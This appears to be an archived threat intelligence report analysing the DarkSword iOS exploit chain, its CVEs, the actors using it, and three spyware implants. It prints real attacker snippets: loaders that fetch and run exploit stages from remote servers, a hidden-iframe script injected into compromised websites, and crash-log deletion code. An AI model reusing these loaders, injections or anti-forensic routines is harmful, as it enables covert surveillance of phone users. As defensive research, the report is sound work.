{
	"id": "adefcfce-0050-436b-a69f-acb2bf9d3bcb",
	"created_at": "2026-04-06T00:16:47.384859Z",
	"updated_at": "2026-04-10T03:31:13.602438Z",
	"deleted_at": null,
	"sha1_hash": "62eabf70d765e7fc055409aa7008f48ee4ec3cfb",
	"title": "The Proliferation of DarkSword: iOS Exploit Chain Adopted by Multiple Threat Actors",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 521432,
	"plain_text": "The Proliferation of DarkSword: iOS Exploit Chain Adopted by\r\nMultiple Threat Actors\r\nBy Google Threat Intelligence Group\r\nPublished: 2026-03-18 · Archived: 2026-04-05 12:54:53 UTC\r\nIntroduction \r\nGoogle Threat Intelligence Group (GTIG) has identified a new iOS full-chain exploit that leveraged multiple zero-day vulnerabilities to fully compromise devices. Based on toolmarks in recovered payloads, we believe the exploit\r\nchain to be called DarkSword. Since at least November 2025, GTIG has observed multiple commercial\r\nsurveillance vendors and suspected state-sponsored actors utilizing DarkSword in distinct campaigns. These threat\r\nactors have deployed the exploit chain against targets in Saudi Arabia, Turkey, Malaysia, and Ukraine.\r\nDarkSword supports iOS versions 18.4 through 18.7 and utilizes six different vulnerabilities to deploy final-stage\r\npayloads. GTIG has identified three distinct malware families deployed following a successful DarkSword\r\ncompromise: GHOSTBLADE, GHOSTKNIFE, and GHOSTSABER. The proliferation of this single exploit chain\r\nacross disparate threat actors mirrors the previously discovered Coruna iOS exploit kit. Notably, UNC6353, a\r\nsuspected Russian espionage group previously observed using Coruna, has recently incorporated DarkSword into\r\ntheir watering hole campaigns.\r\nIn this blog post, we examine the uses of DarkSword by these distinct threat actors, provide an analysis of their\r\nfinal-stage payloads, and describe the vulnerabilities leveraged by DarkSword. GTIG reported the vulnerabilities\r\nused in DarkSword to Apple in late 2025, and all vulnerabilities were patched with the release of iOS 26.3\r\n(although most were patched prior). We have added domains involved in DarkSword delivery to Safe Browsing,\r\nand strongly urge users to update their devices to the latest version of iOS. 
In instances where an update is not\r\npossible, it is recommended that Lockdown Mode be enabled for enhanced security.\r\nThis research is published in coordination with our industry partners at Lookout and iVerify.\r\nDiscovery Timeline\r\nGTIG has identified several different users of the DarkSword exploit chain dating back to November 2025. In\r\naddition to the case studies on DarkSword usage documented in this blog post, we assess it is likely that other\r\ncommercial surveillance vendors or threat actors may also be using DarkSword.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 1 of 23\n\nFigure 1: Timeline of DarkSword observations and vulnerability patches\r\nSaudi Arabian Users Targeted via Snapchat-Themed Website (UNC6748)\r\nIn early November 2025, GTIG identified the threat cluster UNC6748 leveraging a Snapchat-themed website,\r\nsnapshare[.]chat, to target Saudi Arabian users (Figure 2). The landing page on the website included JavaScript\r\ncode using a mix of obfuscation techniques, and created a new IFrame that pulled in another resource at\r\nframe.html (Figure 3). The landing page JavaScript also set a session storage key named uid, and checked if\r\nthat key was already set prior to creating the IFrame that fetches the next delivery stage. We assess this is to\r\nprevent re-infecting prior victims. In subsequent observations of UNC6748 throughout November 2025, we\r\nobserved them update the landing page to include anti-debugging and additional obfuscation to hinder analysis.\r\nWe also identified additional code added when the actor attempts to infect a user using Chrome, where the x-safari-https protocol handler is used to open the page in Safari (Figure 5). This suggests that UNC6748 didn't\r\nhave an exploit chain for Chrome at the time of this activity. 
During the infection process, the victim is redirected\r\nto a legitimate Snapchat website in an attempt to masquerade the activity.\r\nframe.html is a simple HTML file that dynamically injects a new script tag that loads in the main exploit\r\nloader, rce_loader.js (Figure 4). The loader performs some initialization used by subsequent stages, and\r\nfetches a remote code execution (RCE) exploit from the server using XMLHttpRequest (Figure 6).\r\nWe observed UNC6748 activity multiple times throughout November 2025, where both major and minor updates\r\nwere made to their infection process:\r\nThe first UNC6748 activity we observed only had support for one RCE exploit split across two files,\r\nrce_module.js and rce_worker_18.4.js (Figure 7). This exploit primarily leveraged CVE-2025-31277,\r\na memory corruption vulnerability in JavaScriptCore (the JavaScript engine used in WebKit and Apple\r\nSafari), and also CVE-2026-20700, a Pointer Authentication Codes (PAC) bypass in dyld.\r\nWe then identified activity several days later where another RCE exploit was added, rce_worker_18.6.js\r\n(Figure 8). This exploit used CVE-2025-43529, a different memory corruption vulnerability in\r\nJavaScriptCore, alongside the same CVE-2026-20700 exploit in the same file.\r\nThe loader was modified to also fetch an rce_module_18.6.js payload, which only defined a\r\nsimple function that was not observed in use elsewhere.\r\nHowever, the logic implemented for this did not correctly serve the iOS 18.4 exploit if the device\r\nversion wasn't 18.6, and did not account for the existence of iOS 18.7, even though it was released\r\ntwo months prior in September 2025. This suggests that this update may have been originally\r\nwritten months prior to UNC6748 acquiring and/or deploying it.\r\nLater in November 2025, we observed another module added, rce_worker_18.7.js (Figure 9). 
This was\r\nan updated version of rce_worker_18.6.js, but with offsets added to support iOS 18.7.\r\nThere was also a logic flaw in the loader in this case, as it loaded the exploit for iOS 18.7 regardless\r\nof the detected device version.\r\nIn our observations, UNC6748 used the same modules for sandbox escapes and privilege escalation, along with\r\nthe same final payload, GHOSTKNIFE.\r\nFigure 2: snapshare[.]chat decoy page\r\nif (!sessionStorage.getItem(\"uid\") \u0026\u0026 isTouchScreen) {\r\n sessionStorage.setItem(\"uid\", '1');\r\n const frame = document.createElement(\"iframe\");\r\n frame.src = \"frame.html?\" + Math.random();\r\n frame.style.height = 0;\r\n frame.style.width = 0;\r\n frame.style.border = \"none\";\r\n document.body.appendChild(frame);\r\n} else {\r\n top.location.href = \"red\";\r\n}\r\nFigure 3: Landing page snippet that loads frame.html (UNC6748, November 2025)\r\n\u003c!DOCTYPE html\u003e\r\n\u003chtml\u003e\r\n\u003chead\u003e\r\n \u003ctitle\u003e\u003c/title\u003e\r\n\u003c/head\u003e\r\n\u003cbody\u003e\r\n \u003cscript type=\"text/javascript\"\u003edocument.write('\u003cscript defer=\\\"defer\\\" src=\\\"rce_loader.js\\\"\\\u003e\\\u003c\\/script\\\u003e');\u003c\r\n\u003c/body\u003e\r\n\u003c/html\u003e\r\nFigure 4: frame.html contents (UNC6748, November 2025)\r\nif (typeof browser !== \"undefined\" || !isIphone()) {\r\n console.log(\"\");\r\n} else {\r\n location.href = \"x-safari-https://snapshare.chat/\u003credacted\u003e\";\r\n}\r\nFigure 5: Landing page code snippet showing x-safari-https use (UNC6748, November 2025)\r\nfunction getJS(fname,method = 'GET')\r\n{\r\n try\r\n {\r\n url = fname;\r\n print(`trying to fetch ${method} from: ${url}`);\r\n let xhr = new XMLHttpRequest();\r\n xhr.open(\"GET\", `${url}` , 
false);\r\n xhr.send(null);\r\n return xhr.responseText;\r\n }\r\n catch(e)\r\n {\r\n print(\"got error in getJS: \" + e);\r\n }\r\n}\r\nFigure 6: rce_loader.js snippet showing the logic for fetching additional stages (UNC6748, November 2025)\r\nlet workerCode = \"\";\r\nworkerCode = getJS(`rce_worker_18.4.js`); // local version\r\nlet workerBlob = new Blob([workerCode],{type:'text/javascript'});\r\nlet workerBlobUrl = URL.createObjectURL(workerBlob);\r\nFigure 7: rce_loader.js snippet showing a single RCE exploit worker being loaded (UNC6748, November\r\n2025)\r\nlet workerCode = \"\";\r\nif(ios_version == '18,6' || ios_version == '18,6,1' || ios_version == '18,6,2')\r\n workerCode = getJS(`rce_worker_18.6.js?${Date.now()}`); // local version\r\nelse\r\n workerCode = getJS(`rce_worker_18.6.js?${Date.now()}`); // local version\r\nlet workerBlob = new Blob([workerCode],{type:'text/javascript'});\r\nlet workerBlobUrl = URL.createObjectURL(workerBlob);\r\nFigure 8: rce_loader.js snippet showing (attempted) support for different RCE exploit workers (UNC6748,\r\nNovember 2025)\r\nlet workerCode = \"\";\r\nif(ios_version == '18,7')\r\n workerCode = getJS(`rce_worker_18.7.js?${Date.now()}`); // local version\r\nelse\r\n workerCode = getJS(`rce_worker_18.7.js?${Date.now()}`); // local version\r\nlet workerBlob = new Blob([workerCode],{type:'text/javascript'});\r\nlet workerBlobUrl = URL.createObjectURL(workerBlob);\r\nFigure 9: rce_loader.js snippet with iOS 18.7 support added (UNC6748, November 2025)\r\nGHOSTKNIFE\r\nIn this activity, we observed UNC6748 deploy a backdoor GTIG tracks as GHOSTKNIFE. GHOSTKNIFE,\r\nwritten in JavaScript, has several modules for exfiltrating different types of data, including signed-in accounts,\r\nmessages, browser data, location history, and recordings. 
It also supports downloading files from the C2 server,\r\ntaking screenshots, and recording audio from the device's microphone. GHOSTKNIFE communicates with its C2\r\nserver using a custom binary protocol over HTTP, encrypted using a scheme based on ECDH and AES.\r\nGHOSTKNIFE can update its config with new parameters from its C2 server.\r\nGHOSTKNIFE writes files to disk during its execution under /tmp/\u003cuuid\u003e.\u003cnumbers\u003e, where uuid is a\r\nrandomly generated UUIDv4 value and numbers is a hard-coded sequence of several digits. Under that directory,\r\nit creates multiple subfolders including STORAGE, DATA, and TMP. As each module of GHOSTKNIFE executes,\r\nit writes its data to /tmp/\u003cuuid\u003e.\u003cnumbers\u003e/STORAGE/\u003cuuid2\u003e.\u003cid\u003e, where id is the numeric value of the\r\nmodule and uuid2 is a different randomly generated UUIDv4 value. Additionally, GHOSTKNIFE periodically\r\nerases crash logs from the device to cover its tracks in case of unexpected failures (Figure 10).\r\n cleanLogs(){\r\n let files = MyHelper.getContentsOfDir(\"/var/mobile/Library/Logs/CrashReporter/\");\r\n for(let file of files){//.ips // mediaplaybackd-\" panic-full-\r\n if(file.includes(\"mediaplaybackd\") || file.includes(\"SpringBoard\") || file.includes(\"com.apple.WebKit.\")\r\nMyHelper.deleteFileAtPath(file);\r\n }\r\n }\r\n }\r\nFigure 10: GHOSTKNIFE snippet responsible for deleting crash logs\r\nCampaigns Targeting Users in Turkey and Malaysia (PARS Defense)\r\nIn late November 2025, GTIG observed activity associated with the Turkish commercial surveillance vendor\r\nPARS Defense where DarkSword was used in Turkey, with support for iOS 18.4-18.7. 
Unlike the UNC6748\r\nactivity, this campaign was carried out with more attention to OPSEC, with obfuscation applied to the exploit\r\nloader and some of the exploit stages, and the use of ECDH and AES to encrypt exploits between the server and\r\nthe victim (Figure 11). Additionally, the obfuscated version of rce_loader.js used by PARS Defense fetched the\r\ncorrect RCE exploit depending on the detected iOS version (Figure 12).\r\nSubsequently, in January 2026, GTIG observed additional activity in Malaysia associated with a different PARS\r\nDefense customer. In this case, we were able to collect a different loader used in the activity, which contains\r\nadditional device fingerprinting logic, and also used the uid session storage check. This loader also uses the\r\ntop.location.href redirect for targets that do not pass all of the checks like UNC6748 did, but also sets\r\nwindow.location.href to the same URL (Figure 13).\r\nWhere available, GTIG identified a different final payload used in this activity, a backdoor we track as\r\nGHOSTSABER.\r\nfunction getJS(_0x12fba8) {\r\n const _0x35744f = generateKeyPair();\r\n const _0x4a6eb4 = exportPublicKeyAsPem(_0x35744f.publicKey);\r\n const _0x1bc168 = self.btoa(_0x4a6eb4);\r\n const _0x119092 = {\r\n 'a': _0x1bc168\r\n };\r\n _0x12fba8 = _0x12fba8.startsWith('/') ? _0x12fba8 : '/' + _0x12fba8;\r\n const _0x1fedd2 = new XMLHttpRequest();\r\n _0x1fedd2.open('POST', 'https://\u003credacted\u003e' + (_0x12fba8 + '?' 
+ Date.now()), false);\r\n _0x1fedd2.setRequestHeader('Content-Type', 'application/json');\r\n _0x1fedd2.send(JSON.stringify(_0x119092));\r\n if (_0x1fedd2.status === 0xc8) {\r\n const _0x362968 = JSON.parse(_0x1fedd2.responseText);\r\n const _0x32efb2 = _0x362968.a;\r\n const _0x46ca4b = _0x362968.b;\r\n const _0xfae3b8 = b64toUint8Array(_0x32efb2);\r\n const _0x2f4536 = b64toUint8Array(_0x46ca4b);\r\n const _0xa36b4f = deriveAesKey(_0x35744f.privateKey, _0x2f4536);\r\n const _0x36e338 = decryptData(_0xfae3b8, _0xa36b4f);\r\n const _0x50186a = new TextDecoder().decode(_0x36e338);\r\nreturn _0x50186a;\r\n }\r\n return null;\r\n}\r\nFigure 11: Deobfuscated getJS() snippet from the DarkSword loader (PARS Defense, November 2025)\r\nlet workerCode = '';\r\nif (ios_version == '18,6' || ios_version == '18,6,1' || ios_version == '18,6,2' || ios_version == '18,7') {\r\n workerCode = getJS('6cde159c.js?' + Date.now());\r\n} else {\r\n workerCode = getJS('a9bc5c66.js?' + Date.now());\r\n}\r\nlet workerBlob = new Blob([workerCode], {\r\n 'type': 'text/javascript'\r\n});\r\nlet workerBlobUrl = URL.createObjectURL(workerBlob);\r\nFigure 12: Deobfuscated snippet for loading the RCE workers (PARS Defense, November 2025)\r\nif (!sessionStorage.getItem('uid') \u0026\u0026 canUseApplePay() \u0026\u0026 \"standalone\" in navigator \u0026\u0026 (CSS.supports(\"backdrop-\r\n (() =\u003e {\r\n function _0x45e723(_0x52731a) {\r\n const _0x43f8d9 = generateKeyPair();\r\n const _0x427066 = exportPublicKeyAsPem(_0x43f8d9.publicKey);\r\n const _0x5cfee7 = self.btoa(_0x427066);\r\n const _0x96910f = {\r\n 'a': _0x5cfee7\r\n };\r\n _0x52731a = _0x52731a.startsWith('/') ? _0x52731a : '/' + _0x52731a;\r\n const _0x436cc4 = new XMLHttpRequest();\r\n _0x436cc4.open(\"POST\", 'https://\u003credacted\u003e' + (_0x52731a + '?' 
+ Date.now()), false);\r\n _0x436cc4.setRequestHeader('Content-Type', \"application/json\");\r\n _0x436cc4.send(JSON.stringify(_0x96910f));\r\n if (_0x436cc4.status === 0xc8) {\r\n const _0x4a4193 = JSON.parse(_0x436cc4.responseText);\r\n const _0x362b30 = _0x4a4193.a;\r\n const _0x536004 = _0x4a4193.b;\r\n const _0x183b3f = b64toUint8Array(_0x362b30);\r\n const _0x46bbee = b64toUint8Array(_0x536004);\r\n const _0x43e600 = deriveAesKey(_0x43f8d9.privateKey, _0x46bbee);\r\n const _0x2e0735 = decryptData(_0x183b3f, _0x43e600);\r\n const _0x26a8b1 = new TextDecoder().decode(_0x2e0735);\r\n return _0x26a8b1;\r\n }\r\n return null;\r\n}\r\n let _0x100ce6 = _0x45e723('6297d177.html?' + Math.random());\r\n const _0x5f5a7d = document.createElement(\"iframe\");\r\n _0x5f5a7d.srcdoc = _0x100ce6;\r\n _0x5f5a7d.style.height = 0x0;\r\n _0x5f5a7d.style.width = 0x0;\r\n _0x5f5a7d.style.border = 'none';\r\n document.body.appendChild(_0x5f5a7d);\r\n })();\r\n} else {\r\n top.location.href = \"\u003clegit website\u003e\";\r\n window.location.href = '\u003clegit website\u003e';\r\n}\r\nFigure 13: Deobfuscated landing page snippet to fetch the DarkSword loader (PARS Defense, January 2026)\r\nGHOSTSABER\r\nGHOSTSABER is a JavaScript backdoor used by PARS Defense that communicates with its C2 server over\r\nHTTP(S). Its capabilities include device and account enumeration, file listing, data exfiltration, and the execution\r\nof arbitrary JavaScript code; a complete list of its supported commands is detailed in Table 1. Observed\r\nGHOSTSABER samples contain references to several commands that lack the necessary code to be executed,\r\nincluding some that purport to record audio from the device's microphone and send the device's current\r\ngeolocation to the C2 server. 
These commands use a function called send_command_to_upper_process, which\r\nwrites to a shared memory region that is otherwise unused in the implant. We suspect that a follow-on binary\r\nmodule may be downloaded from the C2 server to implement these commands at runtime.\r\nCommand | Description\r\nChangeStatusCheckSleepInterval | Changes the sleep duration between C2 check-ins\r\nSendDeviceInfo | Uploads basic device information to the C2 server\r\nSendUserAccountsList | Uploads a list of the signed-in accounts on the device to the C2 server\r\nSendAppList | Uploads a list of the installed applications to the C2 server\r\nSendCurrentLocation | Not directly implemented\r\nExecuteSqliteQuery | Executes an arbitrary SQL query against an arbitrary SQLite database and uploads the results to the C2 server\r\nUnwrapKey | No-op\r\nSendScreenshot | Not directly implemented\r\nSendWiFiInfo | Not directly implemented\r\nSendThumbnails | Uploads thumbnails from iOS' Photos app within a specified time period to the C2 server\r\nSendApp | Uploads all of the files for a specified installed application to the C2 server\r\nRecordAudio | Not directly implemented\r\nSendFiles | Uploads a list of arbitrary files to the C2 server\r\nSendRegEx | Uploads a list of files with paths matching a specified regex pattern to the C2 server\r\nSendFileList | Uploads a recursive list of files and metadata in a specified directory to the C2 server\r\nEvalJs | Executes an arbitrary JavaScript blob and uploads the output to the C2 server\r\nTable 1: Commands supported by GHOSTSABER\r\nNew Ukrainian Watering Hole Activity From UNC6353\r\nGTIG observed the suspected Russian espionage actor UNC6353 leveraging DarkSword in a new watering hole\r\ncampaign targeting Ukrainian users. 
As mentioned in our recent blog post, we first began tracking UNC6353 in\r\nsummer 2025 as a threat cluster conducting watering hole attacks on Ukrainian websites to deliver Coruna. This\r\nnew activity, which has been active through March 2026 but dates back to at least December 2025, leverages the\r\nDarkSword exploit chain to deploy GHOSTBLADE. GTIG notified and collaborated with CERT-UA to mitigate\r\nthis activity.\r\nCompromised Ukrainian websites were updated to include a malicious script tag that fetched the first delivery\r\nstage from an UNC6353 server, static.cdncounter[.]net (Figure 14). This script (Figure 15) dynamically\r\ncreates a new IFrame and sets its source to a file called index.html on the same server (Figure 16). While\r\nindex.html bears some overlap with the landing page logic used by UNC6748 and PARS Defense, it sets the\r\nuid session storage key without checking the session's current state, and includes a Russian language comment\r\nthat translates to \"if uid is still needed, just install it.\"\r\nNotably, the observed UNC6353 use of DarkSword only supported iOS 18.4-18.6. While earlier DarkSword use\r\nattributed to UNC6748 and PARS Defense also supported iOS 18.7, we did not observe that from UNC6353,\r\ndespite their later operational timeline. 
However, the loader used in this version correctly loaded the RCE modules\r\ncorresponding to the running iOS version, which we didn't observe in UNC6748's use of DarkSword with only\r\niOS 18.4-18.6 support (Figure 17).\r\n\u003cscript async src=\"https://static.cdncounter.net/widgets.js?uhfiu27fajf2948fjfefaa42\"\u003e\u003c/script\u003e\r\nFigure 14: Malicious script tag used by UNC6353 (March 2026)\r\n(function () {\r\n const iframe = document.createElement(\"iframe\");\r\n iframe.src = \"https://static.cdncounter.net/assets/index.html\";\r\n iframe.style.width = \"1px\";\r\n iframe.style.height = \"1px\";\r\n iframe.style.border = \"0\";\r\n iframe.style.position = \"absolute\";\r\n iframe.style.left = \"-9999px\";\r\n iframe.style.opacity = \"0.01\";\r\n // важно для Safari (important for Safari)\r\n iframe.setAttribute(\r\n \"sandbox\",\r\n \"allow-scripts allow-same-origin\"\r\n );\r\n document.body.appendChild(iframe);\r\n})();\r\nFigure 15: widgets.js (UNC6353, March 2026)\r\n\u003c!DOCTYPE html\u003e\r\n\u003chtml lang=\"en\"\u003e\r\n\u003chead\u003e\r\n \u003cmeta charset=\"UTF-8\"\u003e\r\n \u003cmeta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\"\u003e\r\n \u003ctitle\u003eTest Page\u003c/title\u003e\r\n\u003c/head\u003e\r\n\u003cbody\u003e\r\n \u003cscript\u003e\r\n // если uid всё ещё нужен — просто устанавливаем (if uid is still needed, just install it)\r\n sessionStorage.setItem('uid', '1');\r\n const frame = document.createElement('iframe');\r\n frame.src = 'frame.html?' 
+ Math.random();\r\n frame.style.width = '1px';\r\n frame.style.opacity = '0.01'\r\n frame.style.position = 'absolute';\r\n frame.style.left = '-9999px';\r\n frame.style.height = '1px';\r\n frame.style.border = 'none';\r\n document.body.appendChild(frame);\r\n \u003c/script\u003e\r\n\u003c/body\u003e\r\n\u003c/html\u003e\r\nFigure 16: index.html (UNC6353, March 2026)\r\nlet workerCode = \"\";\r\nif(ios_version == '18,6' || ios_version == '18,6,1' || ios_version == '18,6,2')\r\n workerCode = getJS(`rce_worker_18.6.js?${Date.now()}`); // local version\r\nelse\r\n workerCode = getJS(`rce_worker_18.4.js?${Date.now()}`); // local version\r\nlet workerBlob = new Blob([workerCode],{type:'text/javascript'});\r\nlet workerBlobUrl = URL.createObjectURL(workerBlob);\r\nFigure 17: rce_loader.js snippet for loading the RCE exploit workers (UNC6353, March 2026)\r\nGHOSTBLADE\r\nFollowing device infections from these watering holes, UNC6353 deployed a malware family GTIG tracks as\r\nGHOSTBLADE. GHOSTBLADE is a dataminer written in JavaScript that collects and exfiltrates a wide variety\r\nof data from a compromised device (Table 2). Data collected by GHOSTBLADE is exfiltrated to an attacker-controlled server over HTTP(S). Unlike GHOSTKNIFE and GHOSTSABER, GHOSTBLADE is less capable and\r\ndoes not support any additional modules or backdoor-like functionality; it also does not operate continuously.\r\nHowever, similar to GHOSTKNIFE, GHOSTBLADE also contains code to delete crash reports, but targets a\r\ndifferent directory where they may be stored (Figure 18). 
The GHOSTBLADE sample observed in this activity\r\nhad full debug logging present along with lots of comments in the code.\r\nNotably, the GHOSTBLADE sample analyzed by GTIG contains a comment and code block conditionally\r\nexecuting code on iOS versions greater than or equal to 18.4, which is the minimum supported version by\r\nDarkSword (Figure 19; note that ver is parsed from uname, which returns the XNU version). This suggests the\r\npayload also supports running on versions lower than 18.4, which isn't supported by DarkSword.\r\nCategory | Collected Data\r\nCommunication and Messaging | iMessage database, Telegram data, WhatsApp data, mail indexes, call logs, contacts interaction data, contacts\r\nIdentity and Access | Device/account identifiers, signed in accounts, device keychains, SIM card info, device profiles\r\nLocation and Mobility | Location history, saved/known WiFi networks and passwords, Find My iPhone settings, location services settings\r\nPersonal Content and Media | Photos metadata, hidden photos, screenshots, iCloud Drive files, Notes database, Calendar database\r\nFinancials and Transactions | Cryptocurrency wallet data\r\nUsage and Behavioral Data | Safari history/bookmarks/cookies, Health database, device personalization data\r\nSystem and Connectivity | List of installed applications, Backup settings/info, cellular usage/data info, App Store preferences\r\nTable 2: Data collected by GHOSTBLADE\r\nstatic deleteCrashReports()\r\n{\r\nthis.getTokenForPath(\"/private/var/containers/Shared/SystemGroup/systemgroup.com.apple.osanalytics/Diag\r\nlibs_JSUtils_FileUtils__WEBPACK_IMPORTED_MODULE_0__[\"default\"].deleteDir(\"/private/var/containers/Share\r\n}\r\nFigure 18: GHOSTBLADE code snippet used for deleting crash logs\r\n// If iOS \u003e= 18.4 we apply migbypass in order to bypass autobox restrictions\r\nif 
(ver.major == 24 \u0026\u0026 ver.minor \u003e= 4) {\r\nmutexPtr = BigInt(libs_Chain_Native__WEBPACK_IMPORTED_MODULE_0__[\"default\"].callSymbol(\"malloc\", 0x100)\r\nlibs_Chain_Native__WEBPACK_IMPORTED_MODULE_0__[\"default\"].callSymbol(\"pthread_mutex_init\", mutexPtr, nu\r\nmigFilterBypass = new MigFilterBypass(mutexPtr);\r\n}\r\nFigure 19: Code conditionally executed on iOS 18.4+ in GHOSTBLADE\r\nDarkSword Exploit Chain\r\nAs mentioned, DarkSword uses six different vulnerabilities to fully compromise a vulnerable iOS device and run a\r\nfinal payload with full kernel privileges (Table 3). Unlike Coruna, DarkSword only supports a limited set of iOS\r\nversions (18.4-18.7), and while the different exploit stages are technically sophisticated, the mechanisms used for\r\nloading the exploits were more basic and less robust than Coruna.\r\nAlso unlike Coruna, DarkSword uses pure JavaScript for all stages of the exploit chain and final payloads. While\r\nmore sophistication is required to bridge between JavaScript and the native APIs and IPC channels used in the\r\nexploit, its use eliminates the need to identify vulnerabilities for bypassing Page Protection Layer (PPL) or Secure\r\nPage Table Monitor (SPTM) exploit mitigations in iOS that prevent unsigned binary code from being executed.\r\nExploit Module | CVE | Description | Exploited as a Zero-Day | Patched in iOS Version(s)\r\nrce_module.js | CVE-2025-31277 | Memory corruption vulnerability in JavaScriptCore | No | 18.6\r\nrce_worker_18.4.js | CVE-2026-20700 | User-mode Pointer Authentication Code (PAC) bypass in dyld | Yes | 26.3\r\nrce_worker_18.6.js, rce_worker_18.7.js | CVE-2025-43529 | Memory corruption vulnerability in JavaScriptCore | Yes | 18.7.3, 26.2\r\nrce_worker_18.6.js, rce_worker_18.7.js | CVE-2026-20700 | User-mode Pointer Authentication Code (PAC) bypass in dyld | Yes | 26.3\r\nsbox0_main_18.4.js, sbx0_main.js | CVE-2025-14174 | Memory corruption vulnerability in ANGLE | Yes | 18.7.3, 26.2\r\nsbx1_main.js | CVE-2025-43510 | Memory management vulnerability in the iOS kernel | No | 18.7.2, 26.1\r\npe_main.js | CVE-2025-43520 | Memory corruption vulnerability in the iOS kernel | No | 18.7.2, 26.1\r\nTable 3: Exploits used in DarkSword\r\nFigure 20: DarkSword infection chain\r\nExploit Delivery\r\nThere are notable similarities and differences between the exploit delivery implementations used by UNC6748,\r\nPARS Defense, and UNC6353. We assess that each of the actors built their delivery mechanisms on a base set of\r\nlogic from the DarkSword developers, and made tweaks to fit their own needs. All three actors had some usage of\r\nthe uid session storage key, but not all in the same way:\r\nWe consistently saw UNC6748 landing pages both set the uid key, and check it before fetching the\r\nexploit loader.\r\nUNC6748 only set the top.location.href property to redirect users if they weren't to be infected.\r\nPARS Defense used the uid key in the same way in January 2026, but the initial activity we saw in\r\nNovember 2025 didn't include it.\r\nLike UNC6748, PARS Defense set top.location.href, but also set window.location.href to\r\nthe same value.\r\nUNC6353 set the uid key, but did not check it before fetching the exploit loader; a comment in the\r\nsource code suggests that they did not know if it was required by the subsequent stages.\r\nBased on the actors' differing usages, we assess that this session storage check logic, along with the subsequent\r\nlogic using frame.html to then fetch rce_loader.js as observed from UNC6748 and UNC6353, was\r\ndeveloped by the DarkSword exploit chain developers. 
We assess that the additional fingerprinting logic used by\r\nPARS Defense in January 2026 and the anti-debug logic used by UNC6748 in November 2025 were likely written\r\nby those users to better meet their operational requirements.\r\nLoader\r\nAll the activity we observed used effectively the same exploit loader, with some minor differences such as PARS\r\nDefense's addition of encryption. The loader manages Web Worker objects that are used by the two RCE exploits,\r\nalong with state transitions throughout the RCE exploit lifecycle. The loader fetches two files for the RCE stages,\r\nnamed variations of rce_module.js and rce_worker.js (e.g. rce_worker_18.4.js). The iOS 18.4 exploit\r\nsplits the logic between the Web Worker script and the main module, which is eval'd in the same context as the\r\nloader; the two different contexts communicate using postMessage as the RCE exploit progresses. The iOS\r\n18.6/18.7 RCE exploit, however, contains all of the exploit logic in the worker, and the corresponding\r\nrce_module.js file just has an unused placeholder function (Figure 21).\r\nThe inconsistencies surrounding the correctness of fetching the RCE stages by the loader module are intriguing.\r\nOne possibility is that the errors were manually corrected by UNC6353 and PARS Defense; alternatively, it is\r\npossible that UNC6748 received the exploit chain updates prior to the other users, and the DarkSword developers\r\nsubsequently fixed those bugs.\r\n// for displaying hex value\r\nfunction dummyy(x) {\r\n return '0x' + x.toString(16);\r\n}\r\nFigure 21: rce_module_18.7.js contents (UNC6748, November 2025)\r\nRemote Code Execution Exploits\r\nGTIG observed two different JavaScriptCore (the JavaScript engine used in WebKit and Apple's Safari browser)\r\nvulnerabilities exploited for remote code execution by DarkSword. 
For devices running versions of iOS prior to\r\n18.6, DarkSword uses CVE-2025-31277, a JIT optimization/type confusion bug which was patched by Apple in\r\niOS 18.6. For devices running iOS 18.6-18.7, DarkSword uses CVE-2025-43529, a garbage collection bug in the\r\nData Flow Graph (DFG) JIT layer of JavaScriptCore which was patched by Apple in iOS 18.7.3 and 26.2 after it\r\nwas reported by GTIG. Both exploits develop their own fakeobj / addrof primitives, and then build arbitrary\r\nread/write primitives the same way on top of them.\r\nBoth vulnerabilities were directly chained with CVE-2026-20700, a bug in dyld used as a user-mode Pointer\r\nAuthentication Codes (PAC) bypass to execute arbitrary code, as required by the subsequent exploit stages. This\r\nvulnerability was patched by Apple in iOS 26.3 after being reported by GTIG.\r\nSandbox Escape Exploits\r\nSafari is designed to use multiple sandbox layers to isolate the different components of the browser where\r\nuntrusted user input may be handled. DarkSword uses two separate sandbox escape vulnerabilities, first by\r\npivoting out of the WebContent sandbox into the GPU process, and then by pivoting from the GPU process to\r\nmediaplaybackd. The same sandbox escape exploits were used regardless of which RCE exploit was needed.\r\nWebContent Sandbox Escape\r\nAs previously discussed by Project Zero and others, Safari's renderer process (known as WebContent) is tightly\r\nsandboxed to limit the blast radius of any vulnerabilities it may contain, since it is the most accessible to untrusted\r\nuser content. To bypass this, DarkSword fetches an exploit called sbox0_main_18.4.js or sbx0_main.js to\r\nbreak out of the WebContent sandbox. 
This exploit leverages CVE-2025-14174, a vulnerability in ANGLE where parameters were not sufficiently validated in a specific WebGL operation, leading to out-of-bounds memory operations in Safari's GPU process, which the DarkSword developers use to execute arbitrary code within the GPU process.\r\nThis vulnerability was reported to Google (the developers of ANGLE) by Apple and GTIG, and was patched in Safari with the release of iOS 18.7.3 and 26.2.\r\nGPU Sandbox Escape\r\nIn Safari, the GPU process has more privileges than the WebContent sandbox, but is still restricted from accessing much of the rest of the system. To bypass this limitation, DarkSword uses another sandbox escape exploit, sbx1_main.js, which leverages CVE-2025-43510, a memory management vulnerability in XNU. This is a copy-on-write bug which is exploited to build arbitrary function call primitives in mediaplaybackd, a system service with a larger set of permissions than the Safari GPU process, where the final exploit can be run. They do this by loading a copy of the JavaScriptCore runtime into the mediaplaybackd process, and executing the next-stage exploit within it.\r\nThis vulnerability was patched by Apple in iOS 18.7.2 and 26.1.\r\nLocal Privilege Escalation and Final Payload\r\nFinally, the exploit loads one last module, pe_main.js. This uses CVE-2025-43520, a kernel-mode race condition in XNU's virtual filesystem (VFS) implementation, which can be exploited to build physical and virtual memory read/write primitives. 
This vulnerability was patched by Apple in iOS 18.7.2 and 26.1.\r\nThe exploit contains a suite of library classes, built on top of its primitives, that are used by the different post-exploitation payloads, such as Native, which provides abstractions for manipulating raw memory and calling native functions, and FileUtils, which provides a POSIX-like filesystem API. Artifacts left behind by the Webpack bundling process in the analyzed GHOSTBLADE sample included file paths that show the on-disk structure of these libraries (Figure 22).\r\nWe assess that GHOSTBLADE was likely developed by the DarkSword developers, based on the consistency in coding styles and the tight integration between it and the library code, which is notably distinct from how GHOSTKNIFE and GHOSTSABER leveraged these libraries. We also observed additional modifications made to some of the post-exploitation payload libraries in the samples observed from PARS Defense, including additional raw memory buffer manipulation, likely used in follow-on binary modules. 
